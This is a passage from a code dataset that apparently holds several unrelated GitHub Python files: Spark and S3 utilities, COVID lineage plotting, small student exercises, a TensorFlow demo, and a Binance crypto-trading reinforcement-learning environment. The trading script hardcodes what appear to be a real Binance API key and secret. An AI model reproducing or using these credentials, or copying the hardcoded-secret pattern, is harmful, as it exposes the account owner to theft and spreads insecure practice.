- max(completenessI, completenessJ)\n deltaCont = contaminationMerged - max(contaminationI, contaminationJ)\n delta = deltaComp - deltaCont\n\n if deltaComp >= minDeltaComp and deltaCont < maxDeltaCont:\n fout.write('%s\\t%s\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\n' %\n (binIdI, binIdJ,\n completenessI, contaminationI,\n completenessJ, contaminationJ,\n deltaComp, deltaCont, delta,\n completenessMerged, contaminationMerged))\n\n fout.close()\n\n return outputFile\n","repo_name":"jtamames/SqueezeMeta","sub_path":"lib/checkm/merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"61"} +{"seq_id":"15426613595","text":"from typing import List\n\nimport pyspark.sql.functions as f\nfrom pyspark.ml.feature import StringIndexerModel\nfrom pyspark.sql.types import FloatType\nfrom pyspark.ml.param import Param, Params, TypeConverters\nfrom pyspark.sql.functions import col, lit\nfrom pyspark.sql import DataFrame\nimport functools\nimport itertools\nimport time\nimport datetime\nimport boto3\nimport re\nimport pandas as pd\n\n\ndef get_config_param():\n # Now just hard coded. Could be imported from a JSON config file.\n return {\n \"treatments\": {\"aap_num_days\": 7, \"ada_num_days\": 7},\n \"imp_threshold\": 5,\n \"weight\": True,\n }\n\n\ndef get_ols_default_model_artifact():\n return {\n \"gnuA_coeff\": None,\n \"gnuB_coeff\": None,\n \"robust_cov\": None,\n \"V_mat\": None,\n \"features_idx_map\": None,\n }\n\n\ndef get_second_element():\n return f.udf(lambda v: float(v[1]), FloatType())\n\n\ndef log_decorator(func):\n # A very simple logging decorator to track steps. Can be replaced by prod logger.\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n start_time = time.time()\n print(f\"[{datetime.datetime.now().ctime()}] Starting the step {func.__qualname__!r}...\")\n result = func(*args, **kwargs)\n end_time = time.time()\n run_time = end_time - start_time\n print(\n f\"[{datetime.datetime.now().ctime()}] Step {func.__qualname__!r} is finished in {run_time:.2f} seconds.\"\n )\n return result\n\n return wrapper\n\n\ndef set_columns_to_zero(df, zero_features):\n # Set the specified columns to zero in the DataFrame\n for feature, value in zero_features.items():\n df = df.withColumn(feature, f.lit(value))\n return df\n\n\ndef flatten_dict(d):\n \"\"\"Flatten a nested dictionary.\"\"\"\n\n def expand(key, value):\n if isinstance(value, dict):\n return [(key + \" \" + k, v) for k, v in flatten_dict(value).items()]\n else:\n return [(key, value)]\n\n items = [item for k, v in d.items() for item in expand(k, v)]\n return dict(items)\n\n\ndef read_json_from_s3(s3_path):\n # Read json file in S3 as pandas dataframe\n uri_header, bucket_name, prefix = parse_uri(s3_path)\n s3 = boto3.resource(\"s3\")\n json_obj = s3.Bucket(bucket_name).Object(prefix).get()[\"Body\"].read().decode(\"utf-8\")\n json_df = pd.read_json(json_obj, lines=True)\n return json_df\n\n\ndef dataframe_reader(path, spark_session):\n # Flexible dataframe reader\n supported_format_list = [\"csv\", \"parquet\", \"json\"]\n uri_header, bucket_name, prefix = parse_uri(path)\n s3_file_iterator = get_s3_file_iterator(path, spark_session)\n # Figure out the data format and get the first single file name\n supported_format_found = False\n while not supported_format_found and s3_file_iterator.hasNext():\n file_rawpath = s3_file_iterator.next().getPath().toUri().getRawPath()\n file_format_check = [file_rawpath.endswith(x) for x in supported_format_list]\n supported_format_found = any(file_format_check)\n single_file_path = f\"{uri_header}{bucket_name}/{file_rawpath}\"\n file_format = list(itertools.compress(supported_format_list, file_format_check))[0]\n # Get number of executors\n n_executors = spark_session.sparkContext.defaultParallelism\n min_partition = n_executors * 2\n # Call spark dataframe reader for respective formats with single file schema inference.\n if file_format == \"csv\":\n small_data = spark_session.read.csv(single_file_path, header=True)\n data_schema = small_data.schema\n df = spark_session.read.csv(path, schema=data_schema, header=True)\n elif file_format == \"json\":\n small_data = spark_session.read.option(\"multiline\", \"true\").json(single_file_path)\n data_schema = small_data.schema\n df = spark_session.read.json(path, schema=data_schema)\n elif file_format == \"parquet\":\n small_data = spark_session.read.parquet(single_file_path)\n data_schema = small_data.schema\n df = spark_session.read.parquet(path, schema=data_schema)\n else:\n raise \"Unsupported file format!\"\n # Ensure the number of partition is at least min_partition\n if df.rdd.getNumPartitions() < min_partition:\n df = df.repartition(min_partition)\n return df\n\n\ndef get_s3_file_iterator(path, spark_session):\n sc = spark_session.sparkContext\n stripped_path = re.sub(\"/\\*.*\", \"\", path)\n java_path = sc._jvm.java.net.URI.create(stripped_path)\n hadoop_path = sc._jvm.org.apache.hadoop.fs.Path(stripped_path)\n hadoop_fs = sc._jvm.org.apache.hadoop.fs.FileSystem.get(\n java_path, sc._jvm.org.apache.hadoop.conf.Configuration()\n )\n s3_file_iterator = hadoop_fs.listFiles(hadoop_path, True)\n return s3_file_iterator\n\n\ndef parse_uri(path):\n uri_header = re.findall(\".*//\", path)[0]\n bucket_name = re.sub(uri_header, \"\", path).split(\"/\")[0]\n prefix = re.sub(f\"{uri_header}{bucket_name}/\", \"\", path)\n return uri_header, bucket_name, prefix\n\n\ndef split_train_test(dataset: DataFrame, rate=0.1):\n train, test = dataset.randomSplit([1 - rate, rate], seed=12345)\n return train, test\n\n\ndef balanced_split_train_test(\n dataset: DataFrame, label_col: str, rate=0.2\n) -> (DataFrame, DataFrame):\n \"\"\"\n Split the dataset into train and test sets with a balanced representation of classes.\n\n Parameters:\n - dataset: The input DataFrame.\n - label_col: The column name of the label.\n - rate: The proportion of the dataset to include in the test split.\n\n Returns:\n - train: The training set.\n - test: The test set.\n \"\"\"\n\n # Get distinct classes\n classes = dataset.select(label_col).distinct().rdd.flatMap(lambda x: x).collect()\n\n train_dfs = []\n test_dfs = []\n\n for class_val in classes:\n # Filter dataset for each class\n class_dataset = dataset.filter(f.col(label_col) == class_val)\n\n # Split the class dataset into train and test\n class_train, class_test = class_dataset.randomSplit([1 - rate, rate])\n\n # Append to the list of train and test dataframes\n train_dfs.append(class_train)\n test_dfs.append(class_test)\n\n # Union all the train and test dataframes\n train = functools.reduce(DataFrame.unionByName, train_dfs)\n test = functools.reduce(DataFrame.unionByName, test_dfs)\n return train, test\n\n\ndef filter_by_range(dataset, col_to_filter, lower_bound=0.05, upper_bound=0.95):\n \"\"\"\n Filter rows based on values in a column not being within a specified range.\n\n Args:\n dataset: The input DataFrame.\n col_to_filter: The column to check values.\n lower_bound: The lower bound of the range.\n upper_bound: The upper bound of the range.\n\n Returns:\n DataFrame with rows filtered.\n \"\"\"\n return dataset.filter((col(col_to_filter) >= lower_bound) & (col(col_to_filter) <= upper_bound))\n\n\ndef truncate_propensity_scores(\n dataset: DataFrame, labels: List[str], lower_bound=0.01, upper_bound=0.99\n):\n \"\"\"\n Truncate propensity scores for the labels based on provided bounds.\n\n Parameters:\n dataset: dataframe to conduct the truncation on.\n labels: List of columns to perform truncation on.\n lower_bound: The lowest allowable bound.\n upper_bound: The highest allowable bound.\n\n\n Returns:\n filtered DataFrames.\n \"\"\"\n combined_filter = generate_combined_filter(labels, lower_bound, upper_bound)\n dataset = dataset.filter(combined_filter)\n\n return dataset\n\n\ndef generate_combined_filter(labels: List[str], lower_bound=0.01, upper_bound=0.99) -> str:\n \"\"\"\n Generate a combined filter expression for multiple labels based on provided bounds.\n\n Parameters:\n labels: List of labels.\n lower_bound: The lowest allowable bound.\n upper_bound: The highest allowable bound.\n\n Returns:\n Combined filter expression string.\n \"\"\"\n filters = [\n f\"({treatment}_propensity_probability BETWEEN {lower_bound} AND {upper_bound})\"\n for treatment in labels\n ]\n combined_filter = \" AND \".join(filters)\n\n return combined_filter\n\n\ndef winsorize_column(dataset, col_name, lower_quantile=0.01, upper_quantile=0.99):\n # Calculate the quantiles\n lower_bound, upper_bound = dataset.approxQuantile(\n col_name, [lower_quantile, upper_quantile], 0.01\n )\n # Winsorize the column\n dataset = dataset.withColumn(\n col_name,\n f.when(f.col(col_name) < lower_bound, lower_bound)\n .when(f.col(col_name) > upper_bound, upper_bound)\n .otherwise(f.col(col_name)),\n )\n return dataset\n\n\ndef cap_values_below_zero(dataset, col_name, lower_cap=0):\n return dataset.withColumn(\n col_name, f.when(f.col(col_name) < lower_cap, lower_cap).otherwise(f.col(col_name))\n )\n\n\ndef set_columns_to_zeros(dataset, columns):\n select_expr = [\n lit(0).alias(col_name) if col_name in columns else col_name for col_name in dataset.columns\n ]\n return dataset.select(*select_expr)\n\n\ndef generate_paths(base, *path_components):\n \"\"\"Generate model paths.\"\"\"\n return f\"{base}/{'/'.join(path_components)}/\"\n\n\ndef get_string_indexer_labels(pipeline_model):\n \"\"\"\n Retrieves the labels (categories) used by the stage of the given pipeline if it's a StringIndexerModel.\n Parameters:\n pipeline_model : pyspark.ml.PipelineModel\n The pipeline model from which the labels are to be extracted.\n\n Returns:\n List of labels (categories) used by the StringIndexerModel.\n \"\"\"\n stage = pipeline_model.stages[-2]\n\n if isinstance(stage, StringIndexerModel):\n return stage.labels\n else:\n raise ValueError(\"Expected stage to be a StringIndexerModel, but found a different type.\")\n\n\nclass HasConfigParam(Params):\n # This is the parameter name\n configParam = Param(Params._dummy(), \"configParam\", \"model training configuration parameters\")\n\n def __init__(self):\n super(HasConfigParam, self).__init__()\n self.config_data = get_config_param()\n self._setDefault(\n configParam=\"defaultConfig\"\n ) # Here, \"defaultConfig\" is just a string key/name\n\n @property\n def getConfigParam(self):\n return self.config_data\n\n @property\n def getTreatments(self):\n treatments = self.getConfigParam[\"treatments\"]\n ada = self._get_treatment_key(treatments, \"ada\")\n aap = self._get_treatment_key(treatments, \"aap\")\n\n if not ada or not aap:\n raise ValueError(\"Required treatments not found in the configuration.\")\n\n # Construct the treatment keys\n treatment_ada = f\"{ada}_in_imp_{treatments['ada_num_days']}\"\n treatment_aap = f\"{aap}_in_imp_{treatments['aap_num_days']}\"\n\n return treatment_ada, treatment_aap\n\n @staticmethod\n def _get_treatment_key(treatments, substring):\n \"\"\"\n Fetch the first key containing the specified substring.\n Returns None if no matching key is found.\n \"\"\"\n for treatment in treatments.keys():\n if substring in treatment:\n return treatment\n return None\n\n\nclass HasThreshold(Params):\n threshold = Param(\n Params._dummy(),\n \"threshold\",\n \"vector of threshold values(or a scalar) for constructing indicator variables\",\n )\n\n def __init__(self):\n super(HasThreshold, self).__init__()\n self._setDefault(threshold=0)\n\n def getThreshold(self):\n return self.getOrDefault(self.threshold)\n\n\nclass HasNmFeaturesCol(Params):\n # Utility mixin class for model param\n nmFeaturesCol = Param(\n Params._dummy(),\n \"nmFeaturesCol\",\n \"No marketing features column name.\",\n typeConverter=TypeConverters.toString,\n )\n\n def __init__(self):\n super(HasNmFeaturesCol, self).__init__()\n self._setDefault(nmFeaturesCol=\"nm_features\")\n\n def getNmFeaturesCol(self):\n return self.getOrDefault(self.nmFeaturesCol)\n\n\nclass HasModelArtifact(Params):\n # Utility mixin class for model param\n modelArtifact = Param(\n Params._dummy(),\n \"modelArtifact\",\n \"model artifacts from training that are required for the scoring stage\",\n )\n\n def __init__(self) -> None:\n super(HasModelArtifact, self).__init__()\n self._setDefault(modelArtifact=get_ols_default_model_artifact())\n\n def getModelArtifact(self):\n return self.getOrDefault(self.modelArtifact)\n\n\ndef hasColumn(df, colname):\n return colname in df.columns\n","repo_name":"arminfar1/dre","sub_path":"utilities/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761449544","text":"'''embers-style analysis/plotting based only on names of sequences'''\nfrom collections import Counter\nimport argparse\nimport re\nimport datetime\n\nimport covid\nfrom verbose import verbose as v\nimport embersutil as emu\nimport lineagetable\nimport owid\n\nOTHER = lineagetable.OTHER\nEMPTY_LINEAGE_REGEX = re.compile(r'EPI_ISL_\\d+\\.\\s*$')\nDEFAULTNAMESFILE=\"Latest-names.nm\"\n\ndef _getargs():\n ap = argparse.ArgumentParser(description=__doc__,\n conflict_handler='resolve')\n covid.corona_args(ap)\n ap.set_defaults(input=covid.default_seqfile(DEFAULTNAMESFILE))\n emu.embers_args(ap)\n paa = ap.add_argument\n paa(\"--lineagetable\",\"-l\",\n help=\"read lineage table from file (or use FROMSEQS)\")\n paa(\"--writeother\",\n help=\"write out the lineages in the 'other' class to this file\")\n paa(\"--skipnone\",action=\"store_true\",\n help=\"sequences labeled 'None' are totally ignored, not put in OTHER\")\n paa(\"--skipother\",action=\"store_true\",\n help=\"skip all sequences in OTHER category\")\n paa(\"--cases\",#default=\"data/owid-harmonized.csv\",\n help=\"csv file with case counts (harmonized, from OWID)\")\n paa(\"--verbose\",\"-v\",action=\"count\",default=0,\n help=\"verbosity\")\n args = ap.parse_args()\n return args\n\n\ndef print_other_lineages(filename,other_lineages):\n '''if other lineages found, print out a summary'''\n if not filename:\n return\n otherlist = sorted(other_lineages,key=other_lineages.get,reverse=True)\n with open(filename,'w') as fout:\n for lin in otherlist:\n print(\"%6d %s\" % (other_lineages[lin],lin),file=fout)\n\ndef main(args):\n '''sparks main'''\n v.vprint(args)\n\n seqs = covid.read_seqfile(args)\n seqs = covid.filter_seqs_by_pattern(seqs,args,keepfirst=False)\n seqs = emu.filter_seqs_by_padded_dates(seqs,args)\n v.vvprint(args)\n\n if args.lineagetable and args.lineagetable.upper() == \"FROMSEQS\":\n ## special case in which lineage table is \"created on the fly\"\n ## with the most common pango lineages (with no grouping of\n ## similar lineages as is done inthe lineage table files)\n seqs = list(seqs)\n T = lineagetable.get_lineage_table_from_seqs(seqs,\n num_lineages=24,\n skipnone=args.skipnone)\n else:\n ## build lineage table from the file\n T = lineagetable.get_lineage_table(args.lineagetable)\n\n v.vvprint('patterns',T.patterns)\n v.vvprint('names',list(T.names.values()))\n\n date_counter = {m: Counter() for m in T.patterns}\n other_lineages = Counter()\n for s in seqs:\n\n seqdate = emu.date_from_seqname(s.name)\n if not seqdate:\n v.vprint_only(5,\"No seqdate:\",s.name)\n continue\n\n if (seqdate.year,seqdate.month) < (2019,11):\n v.vprint_only(5,\"Bad seqdate:\",seqdate,s.name)\n continue\n\n lineage = covid.get_lineage_from_name(s.name)\n\n if args.skipnone:\n if lineage in [\"None\",\"Unassigned\",\"\"]:\n v.vprint_only(5,\"skip None:\",f'[{s.name}]')\n continue\n\n voc = T.last_match(\".\"+lineage)\n\n if voc == OTHER:\n if args.writeother:\n other_lineages[lineage] += 1\n v.vvprint_only(10,'Other:',s.name)\n if args.skipother:\n v.vprint_only(5,\"skip other:\",voc,s.name)\n continue\n\n date_counter[voc][seqdate] += 1\n\n v.vprint_only_summary(\"No seqdate:\",\"warnings triggered\")\n v.vprint_only_summary(\"Bad seqdate:\",\"warnings triggered\")\n v.vprint_only_summary(\"Other:\",\"sequences in OTHER category\")\n v.vprint_only_summary(\"skip None:\",\"sequences skipped\")\n v.vprint_only_summary(\"skip other:\",\"sequences skipped\")\n\n v.vprint('Other lineages:',sum(other_lineages.values()))\n v.vprint('OTHER lineages:',sum(date_counter[OTHER].values()))\n\n print_other_lineages(args.writeother,other_lineages)\n\n nmatches = sum(sum(date_counter[p].values()) for p in T.patterns)\n v.vprint(\"matched sequences:\",nmatches)\n if nmatches==0:\n ifilters = \" \".join(args.filterbyname) if args.filterbyname else \"Global\"\n xfilters = \" w/o \" + \" \".join(args.xfilterbyname) if args.xfilterbyname else \"\"\n raise RuntimeError(f\"No sequences for: {ifilters}{xfilters}\")\n\n onsets=dict()\n if args.onsets:\n ## Don't include OTHER or T.patterns that don't appear in sequence set\n onsets.update( {m: min(date_counter[m])\n for m in T.patterns\n if date_counter[m] and m != OTHER} )\n\n for line in emu.mk_counts_table(date_counter,T.names):\n v.vprint(line)\n\n ord_range, ord_plot_range = emu.get_ord_daterange(date_counter,args.dates)\n v.vprint(\"ordinal range:\",ord_range,ord_plot_range)\n v.vprint(\"ordinal to date:\",args.dates,\n datetime.date.fromordinal(ord_range[0]),\n datetime.date.fromordinal(ord_range[1]))\n cum_counts = emu.get_cumulative_counts(date_counter,ord_range,\n daysperweek=args.daily)\n\n num_cases=None\n ncases=0\n if args.cases:\n df = owid.read_dataframe(args.cases)\n if df is None:\n raise RuntimeError(f'Cannot read OWID datafile: {args.cases}')\n df = owid.filter_cases(df,args.filterbyname,args.xfilterbyname)\n num_cases,ncases = owid.case_counts(df,ord_plot_range,\n daysperweek=args.daily)\n if max(num_cases) == 0:\n v.vprint(f\"No OWID case data for {args.filterbyname}\")\n num_cases = None\n\n if args.skipother:\n del cum_counts[OTHER]\n T.del_pattern(OTHER)\n\n if args.skipnone:\n for nonestring in ['None','Unssigned',\n '(None|Unassigned)',\n '(None|Unassigned|)']:\n try:\n del cum_counts[nonestring]\n T.del_pattern(nonestring)\n v.vvprint('Removing:',nonestring)\n except:\n v.vvprint('Cannot remove:',nonestring)\n\n emu.make_emberstyle_plots(args,'bynames',cum_counts,\n T.names,T.colors,ord_range[0],\n ordplotrange = ord_plot_range,\n num_cases = num_cases,\n title=covid.get_title(args),\n nmatches=nmatches,\n ncases=ncases,\n daily=args.daily,\n onsets=onsets)\n\nif __name__ == \"__main__\":\n\n _args = _getargs()\n v.verbosity(_args.verbose)\n main(_args)\n","repo_name":"jt-lanl/cov-voc","sub_path":"sparks.py","file_name":"sparks.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"4855225572","text":"if __name__ == '__main__':\n while True:\n # get input to coordinate, init flag\n num_list = list(map(int, input().split(' ')))\n begin_coordinate, over_coordinate = num_list[:2], num_list[2:]\n yes_queen_can_flag = False\n\n # if any 0 in num_list -> break\n if 0 in num_list:\n break\n\n # check same row and column\n if begin_coordinate[0] == over_coordinate[0] or begin_coordinate[1] == over_coordinate[1]:\n yes_queen_can_flag = True\n # check bottom left to top right\n elif begin_coordinate[1] - begin_coordinate[0] == over_coordinate[1] - over_coordinate[0]:\n yes_queen_can_flag = True\n # check bottom right to top left\n elif begin_coordinate[1] + begin_coordinate[0] == over_coordinate[1] + over_coordinate[0]:\n yes_queen_can_flag = True\n\n # print\n if yes_queen_can_flag:\n print('True')\n else:\n print('False')","repo_name":"110621013/algorithm","sub_path":"hw/HW6_0504/Queen.py","file_name":"Queen.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32041414666","text":"mahasiswa1 = {\n 'nim' : 202145,\n 'nama' : 'fauzi',\n 'alamat' :'sumbawa' ,\n\n}\nmahasiswa2 = {\n 'nim' :[ 202146, 335, 442 ],\n 'nama':['Digo','Sobri', 'devan'],\n 'almat':['sumbawa','lombok','sumbawa']\n\n}\n#ubah isi data \nbarang =[mahasiswa1, mahasiswa2]\nprint(barang)\nbarang [0] ['harga']=17500\nbarang[1] ['harga']=17500\nprint (barang)\n#tambah kode 4\nmahasiswa2['nim'].append(333)\nmahasiswa2['nama'].append('budi')\nmahasiswa2['alamat'].append('kediri')\nprint(mahasiswa2)\n\n\n","repo_name":"abusobri007/python_zth_trainer","sub_path":"Tugas dan latihan/latihan13.py","file_name":"latihan13.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39865893118","text":"#Faça um Programa que peça dois números e imprima o maior deles.\r\n\r\nnumero_1 = float(input(\"Digite o primeiro numero\"))\r\nnumero_2 = float(input(\"Digite o segundo numero\"))\r\n\r\nif numero_1 > numero_2:\r\n print(\"O maior número é\", numero_1)\r\nelif numero_1 == numero_2:\r\n print(\"Os número são iguais\")\r\nelse:\r\n print(\"O maior número é \", numero_2)","repo_name":"jessemcastro/respostas_estrutura_de_decisao","sub_path":"01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1583098871","text":"import tensorflow as tf\n\n\ndef simple_math():\n # Lets do simple python first\n a = 1\n b = 2\n c = a + b\n print(\"c = a(1) + b(2) =\", c)\n\n # Lets try with tensorflow variables now\n a = tf.constant(1)\n b = tf.constant(2)\n c = a + b\n print(\"c = a(1) + b(2) =\", c)\n\n # In order to get a value out of tensorflow, we must \"run\" the tenors in a\n # session\n with tf.Session() as session:\n result = session.run(c)\n print(\"c = a(1) + b(2) =\", result)\n\n\ndef minimize():\n # y = (x - a) * (x - b) is a \"parabolic function\" with its lowest point in\n # the middle of 'a' and 'b'\n\n # Let 'a' and 'b' be placeholders, we will assign values to them later\n a = tf.placeholder(tf.float32)\n b = tf.placeholder(tf.float32)\n x = tf.Variable(0., dtype=tf.float32)\n y = (x - a) * (x - b)\n\n train_op = tf.train.AdamOptimizer(0.01).minimize(y)\n\n with tf.Session() as session:\n session.run(tf.global_variables_initializer())\n\n # Lets try for a = 0, b = 4\n print(\"trying to find the minimum value of 'y' for \"\n \"'y = (x - 0) * (x - 4)'\")\n placehoders = {a: 0, b: 4}\n for _ in range(30):\n for _ in range(20):\n session.run(train_op, placehoders)\n print(session.run((x, y), placehoders))\n\n # Now lets try for a = 4, b = 8\n print(\"trying to find the minimum value of 'y' for \"\n \"'y = (x - 4) * (x - 8)'\")\n placehoders = {a: 4, b: 8}\n for _ in range(30):\n for _ in range(20):\n session.run(train_op, placehoders)\n print(session.run((x, y), placehoders))\n\n\ndef main():\n simple_math()\n minimize()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kbairak/codeweek-tensorflow","sub_path":"01_basic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19052989140","text":"#coding:utf-8\n#Write a Python program to combine each line from first file with the corresponding line in second file.\nwith open(\"file\",'r') as f:\n w=f.readlines()\n\nwith open(\"fileCopy\",'r') as f1:\n w1=f1.readlines()\n\nwith open(\"file2\",'w') as f2:\n [f2.write(l1+l2) for l1 in w for l2 in w1 ]","repo_name":"DonaFidele/PythonExercices","sub_path":"file_input_output/exo_14.py","file_name":"exo_14.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41304308679","text":"from binance import Client\nimport pandas as pd\nimport datetime\nimport random\nfrom gym.spaces import Discrete, Box\nimport numpy as np\nfrom collections import deque\nfrom utils import write_to_file\nfrom viz import TradingGraph\nfrom stable_baselines3.common.env_checker import check_env\nfrom gym import Env\nimport os\nfrom stable_baselines3 import PPO\nfrom ta.trend import SMAIndicator\nfrom ta.trend import SMAIndicator, macd, PSARIndicator\nfrom ta.volatility import BollingerBands\nfrom ta.momentum import rsi\n\n\napi_key = \"IkglEvMVJST0OmJA3Jfhi7nGUirfrYRnGsGdBTUoKNkpOPiDmSnfElk3zujUrabT\"\nsecret_key = \"hXOnb96VFSBSfvrHJYAdBv9UGR61CnbpqXZpDhoqGqc0QxbLNI9BdsCZsRrtyou2\"\nclient = Client(api_key, secret_key)\nlog_path = os.path.join('Training', 'Logs')\nsave_path = os.path.join('Training', \"Saved Models\", \"PPO Model Crypto 1\")\n\n\nclass CustomEnv(Env):\n # A custom Bitcoin trading environment\n def __init__(self, df, initial_balance=1000, lookback_window_size=120, trading_cycle=480, render_range=100, normalize_value=40000):\n # Define action space and state size and other custom parameters\n self.df = df.dropna().reset_index()\n self.df_total_steps = len(self.df) - 1\n self.initial_balance = initial_balance\n self.lookback_window_size = lookback_window_size\n self.num_of_parameters = 6\n self.env_steps_size = trading_cycle\n self.render_range=render_range\n self.no_of_orders = 0\n self.order_placed_now = False\n self.punish_value = 0\n self.total_reward = 0\n self.normalize_value = normalize_value\n\n # Action space from 0 to 3, 0 is hold, 1 is buy, 2 is sell\n self.action_space = Discrete(3)\n self.observation_space = Box(low=0, high=100000, shape=(lookback_window_size, self.num_of_parameters))\n self.state = deque(maxlen=self.lookback_window_size)\n self.state_size = (self.lookback_window_size, self.num_of_parameters)\n\n def reset(self, mode=\"training\"):\n self.balance = self.initial_balance\n self.net_worth = self.initial_balance\n self.prev_net_worth = self.initial_balance\n self.crypto_held = 0\n self.crypto_sold = 0\n self.crypto_bought = 0\n self.no_of_orders = 0\n self.punish_value = 0\n\n print (self.total_reward)\n self.total_reward = 0\n if mode == \"training\":\n self.start_step = random.randint(self.lookback_window_size, self.df_total_steps - self.env_steps_size)\n self.end_step = self.start_step + self.env_steps_size\n else:\n self.start_step = self.lookback_window_size\n self.end_step = self.df_total_steps\n self.current_step = self.start_step\n for i in reversed(range(self.lookback_window_size)):\n current_step = self.current_step - i\n self.state.append([self.df.loc[current_step, 'Open'],\n self.df.loc[current_step, 'High'],\n self.df.loc[current_step, 'Low'],\n self.df.loc[current_step, 'Close'],\n self.df.loc[current_step, 'Volume'],\n self.balance\n ])\n\n self.visualization = TradingGraph(Render_range=self.render_range) # init visualization\n self.trades = deque(maxlen=self.render_range)\n\n return np.array(self.state)\n\n\n # Execute one time step within the environment\n def step(self, action):\n self.crypto_bought = 0\n self.crypto_sold = 0\n self.current_step += 1\n time = self.df.loc[self.current_step, 'Time'] # for visualization\n high = self.df.loc[self.current_step, 'High'] # for visualization\n low = self.df.loc[self.current_step, 'Low'] # for visualization\n\n current_price = self.df.loc[self.current_step, 'Close']\n self.order_placed_now = False\n if action == 0: # Hold\n pass\n elif action == 1 and self.balance > self.initial_balance/100:\n # Buy with 100% of current balance\n self.crypto_bought = self.balance / current_price\n self.balance -= self.crypto_bought * current_price\n self.crypto_held += self.crypto_bought\n self.no_of_orders += 1\n self.order_placed_now = True\n self.trades.append({'time' : time, 'High' : high, 'Low' : low, 'total': self.crypto_bought, 'type': \"buy\", \"current_price\": current_price})\n\n elif action == 2 and self.crypto_held > 0:\n # Sell 100% of current crypto held\n self.crypto_sold = self.crypto_held\n self.balance += self.crypto_sold * current_price\n self.crypto_held -= self.crypto_sold\n self.no_of_orders += 1\n self.order_placed_now = True\n self.trades.append({'time' : time, 'High' : high, 'Low' : low, 'total': self.crypto_sold, 'type': \"sell\", \"current_price\": current_price})\n\n self.prev_net_worth = self.net_worth\n self.net_worth = self.balance + self.crypto_held * current_price\n\n # Calculate reward\n reward = self.get_reward()\n self.total_reward += reward\n if self.net_worth <= self.initial_balance / 2 or self.current_step >= self.end_step:\n done = True\n else:\n done = False\n\n obs = self._next_observation()\n\n return obs, reward, done, {}\n\n # Get the data points for the given current_step\n def _next_observation(self):\n self.state.append([self.df.loc[self.current_step, 'Open'],\n self.df.loc[self.current_step, 'High'],\n self.df.loc[self.current_step, 'Low'],\n self.df.loc[self.current_step, 'Close'],\n self.df.loc[self.current_step, 'Volume'],\n self.balance\n ])\n return np.array(self.state)\n\n\n# Calculate reward\n def get_reward(self):\n self.punish_value += self.net_worth * 0.00001\n if self.no_of_orders > 1 and self.order_placed_now:\n if self.trades[-1]['type'] == \"buy\":\n reward = self.trades[-2]['total']*self.trades[-2]['current_price'] - self.trades[-2]['total']*self.trades[-1]['current_price']\n reward -= self.punish_value\n self.punish_value = 0\n self.trades[-1][\"Reward\"] = reward\n return reward\n elif self.trades[-1]['type'] == \"sell\":\n reward = self.trades[-1]['total']*self.trades[-1]['current_price'] - self.trades[-2]['total']*self.trades[-2]['current_price']\n reward -= self.punish_value\n self.trades[-1][\"Reward\"] = reward\n self.punish_value = 0\n return reward\n else:\n return 0 - self.punish_value\n\n\n def render(self, visualize=False):\n if visualize:\n time = self.df.loc[self.current_step, 'Time']\n open = self.df.loc[self.current_step, 'Open']\n close = self.df.loc[self.current_step, 'Close']\n high = self.df.loc[self.current_step, 'High']\n low = self.df.loc[self.current_step, 'Low']\n volume = self.df.loc[self.current_step, 'Volume']\n\n # Render the environment to the screen\n self.visualization.render(time, open, high, low, close, volume, self.net_worth, self.trades)\n\ndef addIndicators(df):\n # Add Simple Moving Average (SMA) indicators\n df[\"sma7\"] = SMAIndicator(close=df[\"Close\"], window=7, fillna=True).sma_indicator()\n df[\"sma25\"] = SMAIndicator(close=df[\"Close\"], window=25, fillna=True).sma_indicator()\n df[\"sma99\"] = SMAIndicator(close=df[\"Close\"], window=99, fillna=True).sma_indicator()\n\n # Add Bollinger Bands indicator\n indicator_bb = BollingerBands(close=df[\"Close\"], window=20, window_dev=2)\n df['bb_bbm'] = indicator_bb.bollinger_mavg()\n df['bb_bbh'] = indicator_bb.bollinger_hband()\n df['bb_bbl'] = indicator_bb.bollinger_lband()\n\n # Add Parabolic Stop and Reverse (Parabolic SAR) indicator\n indicator_psar = PSARIndicator(high=df[\"High\"], low=df[\"Low\"], close=df[\"Close\"], step=0.02, max_step=2, fillna=True)\n df['psar'] = indicator_psar.psar()\n\n # Add Moving Average Convergence Divergence (MACD) indicator\n df[\"MACD\"] = macd(close=df[\"Close\"], window_slow=26, window_fast=12, fillna=True) # mazas\n\n # Add Relative Strength Index (RSI) indicator\n df[\"RSI\"] = rsi(close=df[\"Close\"], window=14, fillna=True) # mazas\n\n return df\n\n\ndef test_random(env, train_episodes=50, visualize=False):\n average_net_worth = 0\n for episode in range(train_episodes):\n state = env.reset()\n\n while True:\n env.render(visualize)\n\n action = np.random.randint(3, size=1)[0]\n state, reward, done = env.step(action)\n\n if env.current_step == env.end_step:\n average_net_worth += env.net_worth\n print(\"net_worth:\", env.net_worth)\n break\n\n print(\"average_net_worth:\", average_net_worth/train_episodes)\n\ndef test_model(env, model, visualize=True, test_episodes=2):\n\n average_net_worth = 0\n for episode in range(test_episodes):\n state = env.reset()\n while True:\n env.render(visualize)\n action, _ = model.predict(state)\n state, reward, done, _ = env.step(action)\n if env.current_step == env.end_step or done:\n average_net_worth += env.net_worth\n 